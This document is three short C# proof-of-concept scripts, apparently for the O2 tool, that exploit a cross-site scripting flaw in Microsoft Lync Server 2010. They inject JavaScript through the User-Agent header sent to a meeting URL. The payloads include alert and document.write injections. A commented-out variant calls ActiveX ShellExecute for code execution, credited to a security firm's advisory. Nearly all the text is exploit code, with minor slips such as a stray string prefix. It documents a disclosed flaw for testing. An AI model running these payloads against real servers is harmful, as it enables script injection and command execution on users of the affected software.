Lync 2010 XSS on UserAgent PoCs

1.Direct Request.cs

var topPanel = panel.add_Panel(true);

WebClient client = new WebClient ();
Action<string> sendRequest = 
	(payload)=>{
			client.Headers.Add ("user-agent",payload);
			
			var codeViewer =  topPanel.add_SourceCodeViewer();
			var url = "https://meet.AAAAAA.co.uk";
					
			var stream = client.OpenRead(url);
			var reader = new StreamReader(stream);
			var html = reader.ReadToEnd();
			stream.Close ();
			reader.Close ();
					
			codeViewer.set_Text(html)
		  	          .gotoLine(28);
		   };

//sendRequest("Custom-UserAgent;");
sendRequest("XSS; \"; \r\n alert('xss'); // diagInfo = \"");

return client;

//using System.IO
//using System.Net
//O2Ref:System.Net.dll

2. Using WebBrowser control.cs

var topPanel = panel.add_Panel(true);
var browser = topPanel.add_WebBrowser();

var payload = "Custom USER AGENT;";

payload += " \"; document.write('<h1>xss</h2>'); //";

browser.Navigate("https://meet.AAAAAA.co.uk", null, null, b"User-Agent: " + payload);
browser.waitForCompleted();                    
return browser.get_Html();

// from http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header
// in most normal IE configs, the PoC below will throw permission denied
//payload += "var oShell = new ActiveXObject(\"Shell.Application\");oShell.ShellExecute(\"\",\"\",\"\",\"open\",\"1\"); //"; 

3.Using Watin.cs

//var ie = "ie_inMKo_".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true);  // ie randon value for o2cache makes this object to unique amongst multiple instances of this control

var ie = panel.clear().add_IE();

var payload = " \"; document.write('<h1>xss</h2>'); //";

ie.WebBrowser.Navigate("https://meet.AAAAAA.co.uk", null, null,
                    "User-Agent: " + payload);
ie.waitForComplete();                    
return ie.IE.Html;

//using FluentSharp.Watin;
//O2Ref:FluentSharp.Watin.dll
//O2Ref:WatiN.Core.dll